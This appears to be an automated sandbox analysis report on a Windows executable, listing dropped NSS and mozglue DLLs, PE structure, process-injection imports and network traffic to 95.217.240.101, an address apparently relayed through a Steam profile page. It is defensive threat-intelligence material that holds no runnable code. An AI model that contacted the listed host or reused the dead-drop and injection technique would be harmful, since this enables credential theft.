                    SHA-256:AC5C92FE6C51CFA742E475215B83B3E11A4379820043263BF50D4068686C6FA5
                    SHA-512:DD9FF4E06B00DC831439BAB11C10E9B2AE864EA6E780D3835EA7468818F35439F352EF137DA111EFCDF2BB6465F6CA486719451BF6CF32C6A4420A56B1D64571
                    Malicious:false
                    Antivirus:
                    • Antivirus: ReversingLabs, Detection: 0%
                    Preview:MZx.....................@...................................x...........!..L.!This program cannot be run in DOS mode.$..PE..L....4.c.........."!................`........................................p......l- ...@A.........................&..........@....P..x...............P/...`..\...................................................|...\....&..@....................text............................... ..`.rdata..l...........................@..@.data...DR..........................@....00cfg.......@......................@..@.rsrc...x....P......................@..@.reloc..\....`......................@..B........................................................................................................................................................................................................................................................................................................................................................................................................

                    C:\ProgramData\FCGCGDHJEGHJ\softokn3.dll

                    Download File
                    Process:C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe
                    File Type:PE32 executable (DLL) (GUI) Intel 80386, for MS Windows
                    Category:dropped
                    Size (bytes):257872
                    Entropy (8bit):6.727482641240852
                    Encrypted:false
                    SSDEEP:6144:/yF/zX2zfRkU62THVh/T2AhZxv6A31obD6Hq/8jis+FvtVRpsAAs0o8OqTYz+xnU:/yRzX2zfRkX2T1h/SA5PF9m8jJqKYz+y
                    MD5:4E52D739C324DB8225BD9AB2695F262F
                    SHA1:71C3DA43DC5A0D2A1941E874A6D015A071783889
                    SHA-256:74EBBAC956E519E16923ABDC5AB8912098A4F64E38DDCB2EAE23969F306AFE5A
                    SHA-512:2D4168A69082A9192B9248F7331BD806C260478FF817567DF54F997D7C3C7D640776131355401E4BDB9744E246C36D658CB24B18DE67D8F23F10066E5FE445F6
                    Malicious:false
                    Antivirus:
                    • Antivirus: ReversingLabs, Detection: 0%
                    Preview:MZx.....................@...................................x...........!..L.!This program cannot be run in DOS mode.$..PE..L....4.c.........."!................P...............................................Sg....@A........................Dv..S....w..........................P/.......5..8q...............................................{...............................text...&........................... ..`.rdata.............................@..@.data................|..............@....00cfg..............................@..@.rsrc...............................@..@.reloc...5.......6..................@..B........................................................................................................................................................................................................................................................................................................................................................................................................

                    C:\ProgramData\FCGCGDHJEGHJ\vcruntime140.dll

                    Download File
                    Process:C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe
                    File Type:PE32 executable (DLL) (console) Intel 80386, for MS Windows
                    Category:dropped
                    Size (bytes):80880
                    Entropy (8bit):6.920480786566406
                    Encrypted:false
                    SSDEEP:1536:lw2886xv555et/MCsjw0BuRK3jteo3ecbA2W86b+Ld:lw28V55At/zqw+Iq9ecbA2W8H
                    MD5:A37EE36B536409056A86F50E67777DD7
                    SHA1:1CAFA159292AA736FC595FC04E16325B27CD6750
                    SHA-256:8934AAEB65B6E6D253DFE72DEA5D65856BD871E989D5D3A2A35EDFE867BB4825
                    SHA-512:3A7C260646315CF8C01F44B2EC60974017496BD0D80DD055C7E43B707CADBA2D63AAB5E0EFD435670AA77886ED86368390D42C4017FC433C3C4B9D1C47D0F356
                    Malicious:false
                    Antivirus:
                    • Antivirus: ReversingLabs, Detection: 0%
                    Preview:MZ......................@...............................................!..L.!This program cannot be run in DOS mode....$......................08e...................................................u............Rich............PE..L...|.0].........."!.........................................................0.......m....@A.............................................................A... ....... ..8............................ ..@............................................text............................... ..`.data...............................@....idata..............................@..@.rsrc...............................@..@.reloc....... ......................@..B................................................................................................................................................................................................................................................................................................................................

                    C:\Users\user\AppData\Local\Microsoft\Windows\INetCache\IE\53IVYM2Y\sqlx[1].dll

                    Download File
                    Process:C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe
                    File Type:PE32 executable (DLL) (GUI) Intel 80386, for MS Windows
                    Category:dropped
                    Size (bytes):2459136
                    Entropy (8bit):6.052474106868353
                    Encrypted:false
                    SSDEEP:49152:WHoJ9zGioiMjW2RrL9B8SSpiCH7cuez9A:WHoJBGqabRnj8JY/9
                    MD5:90E744829865D57082A7F452EDC90DE5
                    SHA1:833B178775F39675FA4E55EAB1032353514E1052
                    SHA-256:036A57102385D7F0D7B2DEACF932C1C372AE30D924365B7A88F8A26657DD7550
                    SHA-512:0A2D112FF7CB806A74F5EC17FE097D28107BB497D6ED5AD28EA47E6795434BA903CDB49AAF97A9A99C08CD0411F1969CAD93031246DC107C26606A898E570323
                    Malicious:false
                    Antivirus:
                    • Antivirus: ReversingLabs, Detection: 0%
                    Preview:MZ......................@...............................................!..L.!This program cannot be run in DOS mode....$.........7.Z.Y.Z.Y.Z.Y...Z.n.Y...\..Y...]...Y...X.Y.Y.Z.X..Y.O.\.E.Y.O.].U.Y.O.Z.L.Y.l3].[.Y.l3Y.[.Y.l3..[.Y.l3[.[.Y.RichZ.Y.................PE..L...i.`e...........!...%.. .........{D........ ...............................%...........@...........................#..6....$.(.....$.......................$.....`.#.8...........................x.#.@.............$..............................text...G. ....... ................. ..`.rdata...".... ..$.... .............@..@.data...4|... $..b....#.............@....idata........$......^$.............@..@.00cfg........$......p$.............@..@.rsrc.........$......r$.............@..@.reloc..5.....$.......$.............@..B................................................................................................................................................................................................................

                    C:\Users\user\AppData\Local\Microsoft\Windows\INetCache\IE\PMW3U6MX\freebl3[1].dll

                    Download File
                    Process:C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe
                    File Type:PE32 executable (DLL) (GUI) Intel 80386, for MS Windows
                    Category:dropped
                    Size (bytes):685392
                    Entropy (8bit):6.872871740790978
                    Encrypted:false
                    SSDEEP:12288:4gPbPpxMofhPNN0+RXBrp3M5pzRN4l2SQ+PEu9tUs/abAQb51FW/IzkOfWPO9UN7:4gPbPp9NNP0BgInfW2WMC4M+hW
                    MD5:550686C0EE48C386DFCB40199BD076AC
                    SHA1:EE5134DA4D3EFCB466081FB6197BE5E12A5B22AB
                    SHA-256:EDD043F2005DBD5902FC421EABB9472A7266950C5CBACA34E2D590B17D12F5FA
                    SHA-512:0B7F47AF883B99F9FBDC08020446B58F2F3FA55292FD9BC78FC967DD35BDD8BD549802722DE37668CC89EDE61B20359190EFBFDF026AE2BDC854F4740A54649E
                    Malicious:false
                    Antivirus:
                    • Antivirus: ReversingLabs, Detection: 0%
                    Preview:MZx.....................@...................................x...........!..L.!This program cannot be run in DOS mode.$..PE..L....4.c.........."!.........4......p.....................................................@A........................H...S...............x............F..P/.......#................................... ..................@............................text............................... ..`.rdata....... ......................@..@.data...<F...0......................@....00cfg..............................@..@.rsrc...x...........................@..@.reloc...#.......$..."..............@..B........................................................................................................................................................................................................................................................................................................................................................................................................

                    C:\Users\user\AppData\Local\Microsoft\Windows\INetCache\IE\PMW3U6MX\mozglue[1].dll

                    Download File
                    Process:C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe
                    File Type:PE32 executable (DLL) (GUI) Intel 80386, for MS Windows
                    Category:dropped
                    Size (bytes):608080
                    Entropy (8bit):6.833616094889818
                    Encrypted:false
                    SSDEEP:12288:BlSyAom/gcRKMdRm4wFkRHuyG4RRGJVDjMk/x21R8gY/r:BKgcRKMdRm4wFkVVDGJVv//x21R8br
                    MD5:C8FD9BE83BC728CC04BEFFAFC2907FE9
                    SHA1:95AB9F701E0024CEDFBD312BCFE4E726744C4F2E
                    SHA-256:BA06A6EE0B15F5BE5C4E67782EEC8B521E36C107A329093EC400FE0404EB196A
                    SHA-512:FBB446F4A27EF510E616CAAD52945D6C9CC1FD063812C41947E579EC2B54DF57C6DC46237DED80FCA5847F38CBE1747A6C66A13E2C8C19C664A72BE35EB8B040
                    Malicious:false
                    Antivirus:
                    • Antivirus: ReversingLabs, Detection: 0%
                    Preview:MZx.....................@...................................x...........!..L.!This program cannot be run in DOS mode.$..PE..L....4.c.........."!.........^......................................................j.....@A.........................`...W.....,.... ..................P/...0...A...S..............................h.......................Z.......................text...a........................... ..`.rdata..............................@..@.data...D...........................@....00cfg..............................@..@.tls................................@....rsrc........ ......................@..@.reloc...A...0...B..................@..B................................................................................................................................................................................................................................................................................................................................................................

                    C:\Users\user\AppData\Local\Microsoft\Windows\INetCache\IE\PMW3U6MX\msvcp140[1].dll

                    Download File
                    Process:C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe
                    File Type:PE32 executable (DLL) (console) Intel 80386, for MS Windows
                    Category:dropped
                    Size (bytes):450024
                    Entropy (8bit):6.673992339875127
                    Encrypted:false
                    SSDEEP:12288:McPa9C9VbL+3Omy5CvyOvzeOKdqhUgiW6QR7t5s03Ooc8dHkC2esGAWf:McPa90Vbky5CvyUeOKn03Ooc8dHkC2eN
                    MD5:5FF1FCA37C466D6723EC67BE93B51442
                    SHA1:34CC4E158092083B13D67D6D2BC9E57B798A303B
                    SHA-256:5136A49A682AC8D7F1CE71B211DE8688FCE42ED57210AF087A8E2DBC8A934062
                    SHA-512:4802EF62630C521D83A1D333969593FB00C9B38F82B4D07F70FBD21F495FEA9B3F67676064573D2C71C42BC6F701992989742213501B16087BB6110E337C7546
                    Malicious:false
                    Antivirus:
                    • Antivirus: ReversingLabs, Detection: 0%
                    Preview:MZ......................@...............................................!..L.!This program cannot be run in DOS mode....$........1C.._..._..._.)n...._......._...^."._..^..._..\..._..[..._..Z..._.._..._......_..]..._.Rich.._.........................PE..L.....0].........."!.....(..........`........@......................................,.....@A.........................g.......r...........................A.......=..`x..8............................w..@............p.......c..@....................text....&.......(.................. ..`.data...H)...@.......,..............@....idata.......p.......D..............@..@.didat..4............X..............@....rsrc................Z..............@..@.reloc...=.......>...^..............@..B................................................................................................................................................................................................................................................................

                    C:\Users\user\AppData\Local\Microsoft\Windows\INetCache\IE\PMW3U6MX\nss3[1].dll

                    Download File
                    Process:C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe
                    File Type:PE32 executable (DLL) (GUI) Intel 80386, for MS Windows
                    Category:dropped
                    Size (bytes):2046288
                    Entropy (8bit):6.787733948558952
                    Encrypted:false
                    SSDEEP:49152:fECf12gikHlnKGxJRIB+y5nvxnaOSJ3HFNWYrVvE4CQsgzMmQfTU1NrWmy4KoAzh:J7Tf8J1Q+SS5/nr
                    MD5:1CC453CDF74F31E4D913FF9C10ACDDE2
                    SHA1:6E85EAE544D6E965F15FA5C39700FA7202F3AAFE
                    SHA-256:AC5C92FE6C51CFA742E475215B83B3E11A4379820043263BF50D4068686C6FA5
                    SHA-512:DD9FF4E06B00DC831439BAB11C10E9B2AE864EA6E780D3835EA7468818F35439F352EF137DA111EFCDF2BB6465F6CA486719451BF6CF32C6A4420A56B1D64571
                    Malicious:false
                    Antivirus:
                    • Antivirus: ReversingLabs, Detection: 0%
                    Preview:MZx.....................@...................................x...........!..L.!This program cannot be run in DOS mode.$..PE..L....4.c.........."!................`........................................p......l- ...@A.........................&..........@....P..x...............P/...`..\...................................................|...\....&..@....................text............................... ..`.rdata..l...........................@..@.data...DR..........................@....00cfg.......@......................@..@.rsrc...x....P......................@..@.reloc..\....`......................@..B........................................................................................................................................................................................................................................................................................................................................................................................................

                    C:\Users\user\AppData\Local\Microsoft\Windows\INetCache\IE\PMW3U6MX\softokn3[1].dll

                    Download File
                    Process:C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe
                    File Type:PE32 executable (DLL) (GUI) Intel 80386, for MS Windows
                    Category:dropped
                    Size (bytes):257872
                    Entropy (8bit):6.727482641240852
                    Encrypted:false
                    SSDEEP:6144:/yF/zX2zfRkU62THVh/T2AhZxv6A31obD6Hq/8jis+FvtVRpsAAs0o8OqTYz+xnU:/yRzX2zfRkX2T1h/SA5PF9m8jJqKYz+y
                    MD5:4E52D739C324DB8225BD9AB2695F262F
                    SHA1:71C3DA43DC5A0D2A1941E874A6D015A071783889
                    SHA-256:74EBBAC956E519E16923ABDC5AB8912098A4F64E38DDCB2EAE23969F306AFE5A
                    SHA-512:2D4168A69082A9192B9248F7331BD806C260478FF817567DF54F997D7C3C7D640776131355401E4BDB9744E246C36D658CB24B18DE67D8F23F10066E5FE445F6
                    Malicious:false
                    Antivirus:
                    • Antivirus: ReversingLabs, Detection: 0%
                    Preview:MZx.....................@...................................x...........!..L.!This program cannot be run in DOS mode.$..PE..L....4.c.........."!................P...............................................Sg....@A........................Dv..S....w..........................P/.......5..8q...............................................{...............................text...&........................... ..`.rdata.............................@..@.data................|..............@....00cfg..............................@..@.rsrc...............................@..@.reloc...5.......6..................@..B........................................................................................................................................................................................................................................................................................................................................................................................................

                    C:\Users\user\AppData\Local\Microsoft\Windows\INetCache\IE\PMW3U6MX\vcruntime140[1].dll

                    Download File
                    Process:C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe
                    File Type:PE32 executable (DLL) (console) Intel 80386, for MS Windows
                    Category:dropped
                    Size (bytes):80880
                    Entropy (8bit):6.920480786566406
                    Encrypted:false
                    SSDEEP:1536:lw2886xv555et/MCsjw0BuRK3jteo3ecbA2W86b+Ld:lw28V55At/zqw+Iq9ecbA2W8H
                    MD5:A37EE36B536409056A86F50E67777DD7
                    SHA1:1CAFA159292AA736FC595FC04E16325B27CD6750
                    SHA-256:8934AAEB65B6E6D253DFE72DEA5D65856BD871E989D5D3A2A35EDFE867BB4825
                    SHA-512:3A7C260646315CF8C01F44B2EC60974017496BD0D80DD055C7E43B707CADBA2D63AAB5E0EFD435670AA77886ED86368390D42C4017FC433C3C4B9D1C47D0F356
                    Malicious:false
                    Antivirus:
                    • Antivirus: ReversingLabs, Detection: 0%
                    Preview:MZ......................@...............................................!..L.!This program cannot be run in DOS mode....$......................08e...................................................u............Rich............PE..L...|.0].........."!.........................................................0.......m....@A.............................................................A... ....... ..8............................ ..@............................................text............................... ..`.data...............................@....idata..............................@..@.rsrc...............................@..@.reloc....... ......................@..B................................................................................................................................................................................................................................................................................................................................

                    C:\Users\user\AppData\Local\Microsoft\Windows\INetCache\IE\T9RRWRNL\76561199686524322[1].htm

                    Download File
                    Process:C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe
                    File Type:HTML document, Unicode text, UTF-8 text, with very long lines (2969), with CRLF, LF line terminators
                    Category:dropped
                    Size (bytes):34771
                    Entropy (8bit):5.384707329935698
                    Encrypted:false
                    SSDEEP:768:Ddpqm+0Ih3YAA9CWGA2fcDAZPzzgiJmDzJtxvrfJkPVoEAdmPzzgiJmDzJtxvJ2i:Dd8m+0Ih3YAA9CWGA2FZPzzgiJmDzJtZ
                    MD5:E1272A5DEF427D3C572F30E33137E66F
                    SHA1:2418DEAEC6C03B7E940B235F5B22DF985BA4E51C
                    SHA-256:2E5105A3078B8C83EEA7F86251F0D56C93C6749A5C9ED44A23D06566E9550C24
                    SHA-512:508997728F401092B15DA2FFD91A5275A3BEA4AC87E30ED5DD24811D1D2F6F76013F2E9B43FC898420BD326C7F86FC42DDA8BAFD7F4B3BA81C68A3FAC694B478
                    Malicious:false
                    Preview:<!DOCTYPE html>..<html class=" responsive" lang="en">..<head>...<meta http-equiv="Content-Type" content="text/html; charset=UTF-8">.....<meta name="viewport" content="width=device-width,initial-scale=1">....<meta name="theme-color" content="#171a21">....<title>Steam Community :: r8p- https://95.217.240.101|</title>...<link rel="shortcut icon" href="/favicon.ico" type="image/x-icon">...........<link href="https://community.akamai.steamstatic.com/public/shared/css/motiva_sans.css?v=-DH0xTYpnVe2&amp;l=english" rel="stylesheet" type="text/css" >.<link href="https://community.akamai.steamstatic.com/public/shared/css/buttons.css?v=PUJIfhtcQn7W&amp;l=english" rel="stylesheet" type="text/css" >.<link href="https://community.akamai.steamstatic.com/public/shared/css/shared_global.css?v=SPpMitTYp6ku&amp;l=english" rel="stylesheet" type="text/css" >.<link href="https://community.akamai.steamstatic.com/public/css/globalv2.css?v=PAcV2zMBzzSV&amp;l=english" rel="stylesheet" type="text/css" >.<link hr

                    Static File Info

                    General

                    File type:PE32 executable (console) Intel 80386, for MS Windows
                    Entropy (8bit):7.559890664251954
                    TrID:
                    • Win32 Executable (generic) a (10002005/4) 99.96%
                    • Generic Win/DOS Executable (2004/3) 0.02%
                    • DOS Executable Generic (2002/1) 0.02%
                    • Autodesk FLIC Image File (extensions: flc, fli, cel) (7/3) 0.00%
                    File name:file.exe
                    File size:372'224 bytes
                    MD5:75db6dfdebb9bf0d98acfc15f2219c62
                    SHA1:5bc1ceec4269b4e893f2b00c1c4b3c0cb42a3291
                    SHA256:a2f94952c89ea440f82877365db5b4a5cf14a10e4168a22a92fce4a8fd98404f
                    SHA512:b295c110369cb2c56d87aab45ff93961b076474d16ca9a7138ab3e6e7acbc8a13a2949dcbc88e6f2e96e4fae793e1793b3052c7ec390ee3d6cd517029583dd2f
                    SSDEEP:6144:1JhLSp8zWMtAJA0Z9aRlEiw+pVc4Amr7me33k/JNSdiaJIlsZa6n:pLSpmqKRw+84B7mA3aJE4aOAFn
                    TLSH:C384D050B0C08031D663253649E0EBB55E3EF9614F619E9F37A80EBF4F342D2DA61A5B
                    File Content Preview:MZ......................@...............................................!..L.!This program cannot be run in DOS mode....$........N.(./.{./.{./.{*].z./.{*].zS/.{*].z./.{*].z./.{./.{./.{;..z./.{;..z./.{;..z./.{...z./.{...z./.{Rich./.{........PE..L....fGf...

                    File Icon

                    Icon Hash:00928e8e8686b000

                    Static PE Info

                    General

                    Entrypoint:0x405cde
                    Entrypoint Section:.text
                    Digitally signed:false
                    Imagebase:0x400000
                    Subsystem:windows cui
                    Image File Characteristics:EXECUTABLE_IMAGE, 32BIT_MACHINE
                    DLL Characteristics:DYNAMIC_BASE, NX_COMPAT, TERMINAL_SERVER_AWARE
                    Time Stamp:0x66476698 [Fri May 17 14:15:52 2024 UTC]
                    TLS Callbacks:
                    CLR (.Net) Version:
                    OS Version Major:6
                    OS Version Minor:0
                    File Version Major:6
                    File Version Minor:0
                    Subsystem Version Major:6
                    Subsystem Version Minor:0
                    Import Hash:e0b6966096a2c186c5f52fee6a381e0f

                    Entrypoint Preview

                    Instruction
                    call 00007F3884E7D9DBh
                    jmp 00007F3884E7D0A9h
                    mov ecx, dword ptr [ebp-0Ch]
                    mov dword ptr fs:[00000000h], ecx
                    pop ecx
                    pop edi
                    pop edi
                    pop esi
                    pop ebx
                    mov esp, ebp
                    pop ebp
                    push ecx
                    ret
                    mov ecx, dword ptr [ebp-10h]
                    xor ecx, ebp
                    call 00007F3884E7CF95h
                    jmp 00007F3884E7D212h
                    push eax
                    push dword ptr fs:[00000000h]
                    lea eax, dword ptr [esp+0Ch]
                    sub esp, dword ptr [esp+0Ch]
                    push ebx
                    push esi
                    push edi
                    mov dword ptr [eax], ebp
                    mov ebp, eax
                    mov eax, dword ptr [0045A500h]
                    xor eax, ebp
                    push eax
                    push dword ptr [ebp-04h]
                    mov dword ptr [ebp-04h], FFFFFFFFh
                    lea eax, dword ptr [ebp-0Ch]
                    mov dword ptr fs:[00000000h], eax
                    ret
                    push eax
                    push dword ptr fs:[00000000h]
                    lea eax, dword ptr [esp+0Ch]
                    sub esp, dword ptr [esp+0Ch]
                    push ebx
                    push esi
                    push edi
                    mov dword ptr [eax], ebp
                    mov ebp, eax
                    mov eax, dword ptr [0045A500h]
                    xor eax, ebp
                    push eax
                    mov dword ptr [ebp-10h], eax
                    push dword ptr [ebp-04h]
                    mov dword ptr [ebp-04h], FFFFFFFFh
                    lea eax, dword ptr [ebp-0Ch]
                    mov dword ptr fs:[00000000h], eax
                    ret
                    push eax
                    push dword ptr fs:[00000000h]
                    lea eax, dword ptr [esp+0Ch]
                    sub esp, dword ptr [esp+0Ch]
                    push ebx
                    push esi
                    push edi
                    mov dword ptr [eax], ebp
                    mov ebp, eax
                    mov eax, dword ptr [0045A500h]
                    xor eax, ebp
                    push eax
                    mov dword ptr [ebp-10h], esp
                    push dword ptr [ebp-04h]
                    mov dword ptr [ebp-04h], FFFFFFFFh
                    lea eax, dword ptr [ebp-0Ch]
                    mov dword ptr fs:[00000000h], eax

                    Data Directories

                    NameVirtual AddressVirtual Size Is in Section
                    IMAGE_DIRECTORY_ENTRY_EXPORT0x00x0
                    IMAGE_DIRECTORY_ENTRY_IMPORT0x26b540x28.rdata
                    IMAGE_DIRECTORY_ENTRY_RESOURCE0x00x0
                    IMAGE_DIRECTORY_ENTRY_EXCEPTION0x00x0
                    IMAGE_DIRECTORY_ENTRY_SECURITY0x00x0
                    IMAGE_DIRECTORY_ENTRY_BASERELOC0x5d0000x1a54.reloc
                    IMAGE_DIRECTORY_ENTRY_DEBUG0x250e80x1c.rdata
                    IMAGE_DIRECTORY_ENTRY_COPYRIGHT0x00x0
                    IMAGE_DIRECTORY_ENTRY_GLOBALPTR0x00x0
                    IMAGE_DIRECTORY_ENTRY_TLS0x00x0
                    IMAGE_DIRECTORY_ENTRY_LOAD_CONFIG0x250280x40.rdata
                    IMAGE_DIRECTORY_ENTRY_BOUND_IMPORT0x00x0
                    IMAGE_DIRECTORY_ENTRY_IAT0x1e0000x15c.rdata
                    IMAGE_DIRECTORY_ENTRY_DELAY_IMPORT0x00x0
                    IMAGE_DIRECTORY_ENTRY_COM_DESCRIPTOR0x00x0
                    IMAGE_DIRECTORY_ENTRY_RESERVED0x00x0

                    Sections

                    NameVirtual AddressVirtual SizeRaw SizeMD5Xored PEZLIB ComplexityFile TypeEntropyCharacteristics
                    .text0x10000x1c59f0x1c600c974584c4e13e2149107eff417dd9cd3False0.5786756607929515data6.607233236723112IMAGE_SCN_CNT_CODE, IMAGE_SCN_MEM_EXECUTE, IMAGE_SCN_MEM_READ
                    .rdata0x1e0000x933e0x9400f5b90bf6728e730f08e6ae3125e52278False0.39123205236486486data4.691228677009398IMAGE_SCN_CNT_INITIALIZED_DATA, IMAGE_SCN_MEM_READ
                    .data0x280000x3433c0x33400c7f65d0fd90704e9d511f9e8abbc9eb8False0.9840463033536585data7.984832613465078IMAGE_SCN_CNT_INITIALIZED_DATA, IMAGE_SCN_MEM_READ, IMAGE_SCN_MEM_WRITE
                    .reloc0x5d0000x1a540x1c00898c036d1f57c251ff0d1554c59a02d7False0.7325613839285714data6.391338335451278IMAGE_SCN_CNT_INITIALIZED_DATA, IMAGE_SCN_MEM_DISCARDABLE, IMAGE_SCN_MEM_READ

                    Imports

                    DLLImport
                    KERNEL32.dllWaitForSingleObject, CreateRemoteThread, VirtualAlloc, FreeConsole, CloseHandle, WaitForSingleObjectEx, GetCurrentThreadId, GetExitCodeThread, QueryPerformanceCounter, ReleaseSRWLockExclusive, WakeAllConditionVariable, WideCharToMultiByte, MultiByteToWideChar, GetStringTypeW, EncodePointer, DecodePointer, InitializeCriticalSectionEx, GetSystemTimeAsFileTime, GetModuleHandleW, GetProcAddress, EnterCriticalSection, LeaveCriticalSection, DeleteCriticalSection, LCMapStringEx, GetCPInfo, IsProcessorFeaturePresent, UnhandledExceptionFilter, SetUnhandledExceptionFilter, GetCurrentProcess, TerminateProcess, GetCurrentProcessId, InitializeSListHead, IsDebuggerPresent, GetStartupInfoW, CreateFileW, RaiseException, RtlUnwind, GetLastError, SetLastError, InitializeCriticalSectionAndSpinCount, TlsAlloc, TlsGetValue, TlsSetValue, TlsFree, FreeLibrary, LoadLibraryExW, CreateThread, ExitThread, FreeLibraryAndExitThread, GetModuleHandleExW, GetStdHandle, WriteFile, GetModuleFileNameW, ExitProcess, GetCommandLineA, GetCommandLineW, HeapAlloc, HeapFree, CompareStringW, LCMapStringW, GetLocaleInfoW, IsValidLocale, GetUserDefaultLCID, EnumSystemLocalesW, GetFileType, GetFileSizeEx, SetFilePointerEx, FlushFileBuffers, GetConsoleOutputCP, GetConsoleMode, ReadFile, HeapReAlloc, FindClose, FindFirstFileExW, FindNextFileW, IsValidCodePage, GetACP, GetOEMCP, GetEnvironmentStringsW, FreeEnvironmentStringsW, SetEnvironmentVariableW, SetStdHandle, GetProcessHeap, ReadConsoleW, HeapSize, WriteConsoleW

                    Network Behavior

                    Network Port Distribution

                    TCP Packets

                    TimestampSource PortDest PortSource IPDest IP
                    May 17, 2024 18:05:50.275969982 CEST49704443192.168.2.5104.102.42.29
                    May 17, 2024 18:05:50.276067019 CEST44349704104.102.42.29192.168.2.5
                    May 17, 2024 18:05:50.276166916 CEST49704443192.168.2.5104.102.42.29
                    May 17, 2024 18:05:50.302129984 CEST49704443192.168.2.5104.102.42.29
                    May 17, 2024 18:05:50.302206993 CEST44349704104.102.42.29192.168.2.5
                    May 17, 2024 18:05:51.500148058 CEST44349704104.102.42.29192.168.2.5
                    May 17, 2024 18:05:51.500242949 CEST49704443192.168.2.5104.102.42.29
                    May 17, 2024 18:05:51.735167980 CEST49704443192.168.2.5104.102.42.29
                    May 17, 2024 18:05:51.735254049 CEST44349704104.102.42.29192.168.2.5
                    May 17, 2024 18:05:51.735675097 CEST44349704104.102.42.29192.168.2.5
                    May 17, 2024 18:05:51.735737085 CEST49704443192.168.2.5104.102.42.29
                    May 17, 2024 18:05:51.737740040 CEST49704443192.168.2.5104.102.42.29
                    May 17, 2024 18:05:51.784113884 CEST44349704104.102.42.29192.168.2.5
                    May 17, 2024 18:05:52.515008926 CEST44349704104.102.42.29192.168.2.5
                    May 17, 2024 18:05:52.515043974 CEST44349704104.102.42.29192.168.2.5
                    May 17, 2024 18:05:52.515063047 CEST44349704104.102.42.29192.168.2.5
                    May 17, 2024 18:05:52.515149117 CEST49704443192.168.2.5104.102.42.29
                    May 17, 2024 18:05:52.515212059 CEST44349704104.102.42.29192.168.2.5
                    May 17, 2024 18:05:52.515264988 CEST49704443192.168.2.5104.102.42.29
                    May 17, 2024 18:05:52.515264988 CEST49704443192.168.2.5104.102.42.29
                    May 17, 2024 18:05:52.659703970 CEST44349704104.102.42.29192.168.2.5
                    May 17, 2024 18:05:52.659733057 CEST44349704104.102.42.29192.168.2.5
                    May 17, 2024 18:05:52.659960032 CEST49704443192.168.2.5104.102.42.29
                    May 17, 2024 18:05:52.660023928 CEST44349704104.102.42.29192.168.2.5
                    May 17, 2024 18:05:52.660087109 CEST49704443192.168.2.5104.102.42.29
                    May 17, 2024 18:05:52.702033997 CEST44349704104.102.42.29192.168.2.5
                    May 17, 2024 18:05:52.702147007 CEST44349704104.102.42.29192.168.2.5
                    May 17, 2024 18:05:52.702244997 CEST49704443192.168.2.5104.102.42.29
                    May 17, 2024 18:05:52.702244997 CEST49704443192.168.2.5104.102.42.29
                    May 17, 2024 18:05:52.702744007 CEST49704443192.168.2.5104.102.42.29
                    May 17, 2024 18:05:52.702786922 CEST44349704104.102.42.29192.168.2.5
                    May 17, 2024 18:05:52.718935966 CEST49705443192.168.2.595.217.240.101
                    May 17, 2024 18:05:52.718996048 CEST4434970595.217.240.101192.168.2.5
                    May 17, 2024 18:05:52.719536066 CEST49705443192.168.2.595.217.240.101
                    May 17, 2024 18:05:52.719536066 CEST49705443192.168.2.595.217.240.101
                    May 17, 2024 18:05:52.719594002 CEST4434970595.217.240.101192.168.2.5
                    May 17, 2024 18:05:54.403044939 CEST4434970595.217.240.101192.168.2.5
                    May 17, 2024 18:05:54.403175116 CEST49705443192.168.2.595.217.240.101
                    May 17, 2024 18:05:54.413886070 CEST49705443192.168.2.595.217.240.101
                    May 17, 2024 18:05:54.413906097 CEST4434970595.217.240.101192.168.2.5
                    May 17, 2024 18:05:54.414103031 CEST4434970595.217.240.101192.168.2.5
                    May 17, 2024 18:05:54.414161921 CEST49705443192.168.2.595.217.240.101
                    May 17, 2024 18:05:54.414673090 CEST49705443192.168.2.595.217.240.101
                    May 17, 2024 18:05:54.456116915 CEST4434970595.217.240.101192.168.2.5
                    May 17, 2024 18:05:55.392337084 CEST4434970595.217.240.101192.168.2.5
                    May 17, 2024 18:05:55.392419100 CEST4434970595.217.240.101192.168.2.5
                    May 17, 2024 18:05:55.392488003 CEST49705443192.168.2.595.217.240.101
                    May 17, 2024 18:05:55.392488003 CEST49705443192.168.2.595.217.240.101
                    May 17, 2024 18:05:55.395876884 CEST49705443192.168.2.595.217.240.101
                    May 17, 2024 18:05:55.395894051 CEST4434970595.217.240.101192.168.2.5
                    May 17, 2024 18:05:55.398233891 CEST49706443192.168.2.595.217.240.101
                    May 17, 2024 18:05:55.398318052 CEST4434970695.217.240.101192.168.2.5
                    May 17, 2024 18:05:55.398417950 CEST49706443192.168.2.595.217.240.101
                    May 17, 2024 18:05:55.398650885 CEST49706443192.168.2.595.217.240.101
                    May 17, 2024 18:05:55.398685932 CEST4434970695.217.240.101192.168.2.5
                    May 17, 2024 18:05:56.921423912 CEST4434970695.217.240.101192.168.2.5
                    May 17, 2024 18:05:56.921662092 CEST49706443192.168.2.595.217.240.101
                    May 17, 2024 18:05:56.922190905 CEST49706443192.168.2.595.217.240.101
                    May 17, 2024 18:05:56.922218084 CEST4434970695.217.240.101192.168.2.5
                    May 17, 2024 18:05:56.923963070 CEST49706443192.168.2.595.217.240.101
                    May 17, 2024 18:05:56.923975945 CEST4434970695.217.240.101192.168.2.5
                    May 17, 2024 18:05:58.233835936 CEST4434970695.217.240.101192.168.2.5
                    May 17, 2024 18:05:58.233923912 CEST4434970695.217.240.101192.168.2.5
                    May 17, 2024 18:05:58.233968019 CEST49706443192.168.2.595.217.240.101
                    May 17, 2024 18:05:58.234036922 CEST49706443192.168.2.595.217.240.101
                    May 17, 2024 18:05:58.234335899 CEST49706443192.168.2.595.217.240.101
                    May 17, 2024 18:05:58.234360933 CEST4434970695.217.240.101192.168.2.5
                    May 17, 2024 18:05:58.236429930 CEST49707443192.168.2.595.217.240.101
                    May 17, 2024 18:05:58.236515999 CEST4434970795.217.240.101192.168.2.5
                    May 17, 2024 18:05:58.236618996 CEST49707443192.168.2.595.217.240.101
                    May 17, 2024 18:05:58.236922979 CEST49707443192.168.2.595.217.240.101
                    May 17, 2024 18:05:58.236948013 CEST4434970795.217.240.101192.168.2.5
